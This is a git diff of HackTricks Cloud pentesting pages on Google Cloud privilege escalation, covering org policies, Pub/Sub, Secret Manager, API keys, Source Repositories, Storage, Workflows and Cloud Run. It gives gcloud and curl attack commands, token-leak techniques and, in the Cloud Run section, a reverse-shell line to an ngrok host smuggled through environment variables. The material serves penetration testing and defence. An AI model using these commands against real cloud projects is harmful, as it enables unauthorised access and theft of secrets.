-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Initial State @@ -63,20 +50,7 @@ This step authorizes the public key, enabling SSH connection with the correspond ## References -* [https://www.ezequiel.tech/2020/08/dropping-shell-in.html](https://www.ezequiel.tech/2020/08/dropping-shell-in.html) -* [https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) +- [https://www.ezequiel.tech/2020/08/dropping-shell-in.html](https://www.ezequiel.tech/2020/08/dropping-shell-in.html) +- [https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
new file mode 100644
index 000000000..8cd87c332
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
@@ -0,0 +1,25 @@
+# GCP - Orgpolicy Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## orgpolicy
+
+### `orgpolicy.policy.set`
+
+An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected.
+
+```bash
+# Get info
+gcloud resource-manager org-policies describe [--folder | --organization | --project ]
+
+# Disable
+gcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ]
+```
+
+A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
+
+## References
+
+- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
new file mode 100644
index 000000000..f0537d23d
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
@@ -0,0 +1,37 @@
+# GCP - Pubsub Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## PubSub
+
+Get more information in:
+
+{{#ref}}
+../gcp-services/gcp-pub-sub.md
+{{#endref}}
+
+### `pubsub.snapshots.create`
+
+The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**.
+
+### **`pubsub.snapshots.setIamPolicy`**
+
+Assign the pervious permissions to you.
+
+### `pubsub.subscriptions.create`
+
+You can create a push subscription in a topic that will be sending all the received messages to the indicated URL
+
+### **`pubsub.subscriptions.update`**
+
+Set your own URL as push endpoint to steal the messages.
+
+### `pubsub.subscriptions.consume`
+
+Access messages using the subscription.
+
+### `pubsub.subscriptions.setIamPolicy`
+
+Give yourself any of the preiovus permissions
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
new file mode 100644
index 000000000..9f69d21fa
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
@@ -0,0 +1,19 @@
+# GCP - Resourcemanager Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## resourcemanager
+
+### `resourcemanager.organizations.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
+
+### `resourcemanager.folders.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
+
+### `resourcemanager.projects.setIamPolicy`
+
+Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
similarity index 58%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
index 4d01c56b0..08298f6be 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
@@ -1,27 +1,14 @@
 # GCP - Run Privesc
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Cloud Run For more information about Cloud Run check: -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-cloud-run-enum.md +{{#endref}} ### `run.services.create` , `iam.serviceAccounts.actAs`, **`run.routes.invoke`** @@ -91,27 +78,12 @@ Give yourself the previous permissions over Cloud Jobs. Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: -{% code overflow="wrap" %} ```bash gcloud beta run jobs execute job-name --region --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s" ``` -{% endcode %} ## References -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
new file mode 100644
index 000000000..f63af9cf7
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
@@ -0,0 +1,38 @@
+# GCP - Secretmanager Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## secretmanager
+
+For more information about secretmanager:
+
+{{#ref}}
+../gcp-services/gcp-secrets-manager-enum.md
+{{#endref}}
+
+### `secretmanager.versions.access`
+
+This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
+
+```bash
+# Get clear-text of version 1 of secret: ""
+gcloud secrets versions access 1 --secret=""
+```
+
+As this is also a post exploitation technique it can be found in:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
+{{#endref}}
+
+### `secretmanager.secrets.setIamPolicy`
+
+This give you access to give you access to read the secrets from the secret manager, like using:
+
+```bash
+gcloud secrets add-iam-policy-binding \
+ --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \
+ --role="roles/secretmanager.secretAccessor"
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
similarity index 62%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
index e7c58e725..acfdea07f 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md @@ -1,19 +1,6 @@ # GCP - Serviceusage Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## serviceusage @@ -23,29 +10,25 @@ Therefore, with an API key you can make that company pay for your use of the API To learn other permissions and ways to generate API keys check: -{% content-ref url="gcp-apikeys-privesc.md" %} -[gcp-apikeys-privesc.md](gcp-apikeys-privesc.md) -{% endcontent-ref %} +{{#ref}} +gcp-apikeys-privesc.md +{{#endref}} ### `serviceusage.apiKeys.create` An undocumented API was found that can be used to **create API keys:** -{% code overflow="wrap" %} ```bash curl -XPOST "https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)" ``` -{% endcode %} ### `serviceusage.apiKeys.list` Another undocumented API was found for listing API keys that have already been created (the API keys appears in the response): -{% code overflow="wrap" %} ```bash curl "https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)" ``` -{% endcode %} ### **`serviceusage.services.enable`** , **`serviceusage.services.use`** @@ -53,7 +36,7 @@ With these permissions an attacker can enable and use new services in the projec ## **References** -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) +- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
@@ -65,7 +48,7 @@ Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)\*\*\*\* diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md new file mode 100644 index 000000000..447045572 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md 
@@ -0,0 +1,87 @@
+# GCP - Sourcerepos Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Source Repositories
+
+For more information about Source Repositories check:
+
+{{#ref}}
+../gcp-services/gcp-source-repositories-enum.md
+{{#endref}}
+
+### `source.repos.get`
+
+With this permission it's possible to download the repository locally:
+
+```bash
+gcloud source repos clone --project=
+```
+
+### `source.repos.update`
+
+A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone `**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like:
+
+- Owner
+- Editor
+- Source Repository Administrator (`roles/source.admin`)
+- Source Repository Writer (`roles/source.writer`)
+
+To write just perform a regular **`git push`**.
+
+### `source.repos.setIamPolicy`
+
+With this permission an attacker could grant himself the previous permissions.
+
+### Secret access
+
+If the attacker has **access to the secrets** where the tokens are stored, he will be able to steal them. For more info about how to access a secret check:
+
+{{#ref}}
+gcp-secretmanager-privesc.md
+{{#endref}}
+
+### Add SSH keys
+
+It's possible to **add ssh keys to the Source Repository project** in the web console. It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh_keys](https://source.cloud.google.com/user/ssh_keys)
+
+Once your ssh key is set, you can access a repo with:
+
+```bash
+git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/
+```
+
+And then use **`git`** commands are per usual.
+
+### Manual Credentials
+
+It's possible to create manual credentials to access the Source Repositories:
+
+
+ +Clicking on the first link it will direct you to [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3) + +Which will prompt an **Oauth authorization prompt** to give access to **Google Cloud Development**. So you will need either the **credentials of the user** or an **open session in the browser** for this. + +This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`** + +
+ +Executing the script you can then use git clone, push... and it will work. + +### `source.repos.updateProjectConfig` + +With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys: + +```bash +gcloud source project-configs update --disable-pushblock +``` + +You can also configure a different pub/sub topic or even disable it completely: + +```bash +gcloud source project-configs update --remove-topic=REMOVE_TOPIC +gcloud source project-configs update --remove-topic=UPDATE_TOPIC +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md similarity index 64% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md index 3a3594bdd..29193d5f5 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md @@ -1,34 +1,21 @@ # GCP - Storage Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Storage Basic Information: -{% content-ref url="../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-storage-enum.md +{{#endref}} ### `storage.objects.get` This permission allows you to **download files stored inside Cloud Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some GCP services stores their information in buckets: -* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code. -* **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**. +- **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code. +- **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**. ### `storage.objects.setIamPolicy` 
@@ -38,15 +25,14 @@ You can give you permission to **abuse any of the previous scenarios of this sec For an example on how to modify permissions with this permission check this page: -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md" %} -[gcp-public-buckets-privilege-escalation.md](../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md) -{% endcontent-ref %} +{{#ref}} +../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md +{{#endref}} ### `storage.hmacKeys.create` Cloud Storage's "interoperability" feature, designed for **cross-cloud interactions** like with AWS S3, involves the **creation of HMAC keys for Service Accounts and users**. An attacker can exploit this by **generating an HMAC key for a Service Account with elevated privileges**, thus **escalating privileges within Cloud Storage**. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain **perpetually accessible**, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access. -{% code overflow="wrap" %} ```bash # Create key gsutil hmac create # You might need to execute this inside a VM instance @@ -76,7 +62,6 @@ gsutil ls gs://[BUCKET_NAME] # Restore gcloud config set pass_credentials_to_gsutil true ``` -{% endcode %} Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). 
@@ -90,14 +75,14 @@ A very **common exploitation** of buckets where you can write in cloud is in cas **Composer** is **Apache Airflow** managed inside GCP. It has several interesting features: -* It runs inside a **GKE cluster**, so the **SA the cluster uses is accessible** by the code running inside Composer -* All the components of a composer environments (**code of DAGs**, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version. +- It runs inside a **GKE cluster**, so the **SA the cluster uses is accessible** by the code running inside Composer +- All the components of a composer environments (**code of DAGs**, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version. **You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs**](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs) ### Cloud Functions -* Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, **overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code**. +- Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, **overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code**. 
**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions**](https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions) 
@@ -111,36 +96,22 @@ However, with read & write access over this bucket, it's possible to escalate pr The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the `staging..appspot.com` bucket: -* Upload the complete new code of the AppEngine version to a different and available bucket and prepare a **`manifest.json` file with the new bucket name and sha1 hashes of them**. Then, when a new version is created inside the bucket, you just need to modify the `manifest.json` file and upload the malicious one. -* Upload a modified `requirements.txt` version that will use a the **malicious dependencies code and update the `manifest.json`** file with the new filename, URL and the hash of it. -* Upload a **modified `main.py` or `app.yaml` file that will execute the malicious code** and update the `manifest.json` file with the new filename, URL and the hash of it. +- Upload the complete new code of the AppEngine version to a different and available bucket and prepare a **`manifest.json` file with the new bucket name and sha1 hashes of them**. Then, when a new version is created inside the bucket, you just need to modify the `manifest.json` file and upload the malicious one. +- Upload a modified `requirements.txt` version that will use a the **malicious dependencies code and update the `manifest.json`** file with the new filename, URL and the hash of it. +- Upload a **modified `main.py` or `app.yaml` file that will execute the malicious code** and update the `manifest.json` file with the new filename, URL and the hash of it. 
**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-AppEngine**](https://github.com/carlospolop/Monitor-Backdoor-AppEngine) ### GCR -* **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.** - * The bucket used by GCR will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)). +- **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.** + - The bucket used by GCR will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)). -{% hint style="success" %} -This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does't store the images in buckets. -{% endhint %} +> [!TIP] +> This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does't store the images in buckets. 
## **References** -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) +- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md similarity index 50% rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md index 5ee421caf..35e558e54 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md @@ -1,27 +1,14 @@ # GCP - Workflows Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Workflows Basic Information: -{% content-ref url="../gcp-services/gcp-workflows-enum.md" %} -[gcp-workflows-enum.md](../gcp-services/gcp-workflows-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-workflows-enum.md +{{#endref}} ### `workflows.workflows.create`, `iam.serviceAccounts.ActAs`, `workflows.executions.create`, (`workflows.workflows.get`, `workflows.operations.get`) @@ -33,17 +20,17 @@ And here you can find an example of a connector that prints a secret: ```yaml main: - params: [input] - steps: + params: [input] + steps: - access_string_secret: call: googleapis.secretmanager.v1.projects.secrets.versions.accessString args: - secret_id: secret_name - version: 1 - project_id: project-id + secret_id: secret_name + version: 1 + project_id: project-id result: str_secret - returnOutput: - return: '${str_secret}' + return: "${str_secret}" ``` Update from the CLI: @@ -59,7 +46,6 @@ If you get an error like `ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: If you don't have web access it's possible to trigger and see the execution of a Workflow with: -{% code overflow="wrap" %} ```bash # Run execution with output gcloud workflows run --location us-central1 @@ -73,11 +59,9 @@ gcloud workflows executions list # Get execution info and output gcloud workflows executions describe projects//locations//workflows//executions/ ``` -{% endcode %} -{% hint style="danger" %} -You can also check the output of previous executions to look for sensitive information -{% endhint %} +> [!CAUTION] +> You can also check the output of previous executions to look for sensitive information Note that even if you get an error like `PERMISSION_DENIED: Permission 'workflows.operations.get' denied on...` because you don't have that permission, the workflow has been generated. 
@@ -85,13 +69,11 @@ Note that even if you get an error like `PERMISSION_DENIED: Permission 'workflow According [**to the docs**](https://cloud.google.com/workflows/docs/authenticate-from-workflow) it's possible to use workflow steps that will send an HTTP request with the OAuth or OIDC token. However, just like in the case of [Cloud Scheduler](gcp-cloudscheduler-privesc.md), the HTTP request with the Oauth token must be to the host `.googleapis.com`. -{% hint style="danger" %} -Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint** controlled by the user but to leak the **OAuth** token you would **need a bypass** for that protection. However, you are still able to **contact any GCP api to perform actions on behalf the SA** using either connectors or HTTP requests with the OAuth token. -{% endhint %} +> [!CAUTION] +> Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint** controlled by the user but to leak the **OAuth** token you would **need a bypass** for that protection. However, you are still able to **contact any GCP api to perform actions on behalf the SA** using either connectors or HTTP requests with the OAuth token. #### Oauth -{% code overflow="wrap" %} ```yaml - step_A:       call: http.post @@ -101,7 +83,6 @@ Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint*               type: OAuth2               scopes: OAUTH_SCOPE ``` -{% endcode %} #### OIDC 
@@ -123,17 +104,4 @@ Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint* With this permission instead of `workflows.workflows.create` it's possible to update an already existing workflow and perform the same attacks. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
